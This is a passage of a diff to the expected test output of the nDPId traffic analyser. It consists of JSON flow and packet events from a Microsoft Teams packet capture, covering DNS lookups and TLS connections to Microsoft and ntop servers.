{"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1587041690915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":301,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":301,"pkt_l4_len":267,"thread_ts_msec":1587041690915,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEfVLxAADkRaLrAqAEBwKgBBgA1+boBCwAAeGqBgAABAAUAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAAACgAuHWFwcGxpY2F0aW9uaW5zaWdodHNfaW5nZXN0aW9uB21vbml0b3IFYXp1cmXALcBCAAUAAQAAAJEALB1hcHBsaWNhdGlvbmluc2lnaHRzX2luZ2VzdGlvbgtwcml2YXRlbGlua8BgwHwABQABAAAAXwAXAmRjDnRyYWZmaWNtYW5hZ2VyA25ldADAtAAFAAEAAAAeABwQY2ZyLWJyZWV6aWVzdC1pbghjbG91ZGFwcMDGwNcAAQABAAAABwAEKE+KKQ=="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00896{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2323,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041690916,"flow_last_seen":1587041690980,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1679,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1587041690980,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1587041691075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041691075,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZLy0AAP8RCQ\/AqAEGwKgBAfWPADUARdrUdPIBAAABAAAAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1587041691148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1587041691148,"pkt":"KDc3AG3IEBMx8Tl2CABFAACQrGdAADkREZ7AqAEBwKgBBgA19Y8AfAAAdPKBgAABAAIAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAADwAGw9tc2dhcGktcHJvZC1zZnIIY2xvdWRhcHDANMBJAAEAAQAAAAoABDRybAg="} -00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}} +00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041691149,"flow_last_seen":1587041691190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1662,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1587041691190,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041691410} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691399,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041691611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691582,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} @@ -381,8 +387,8 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} -01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 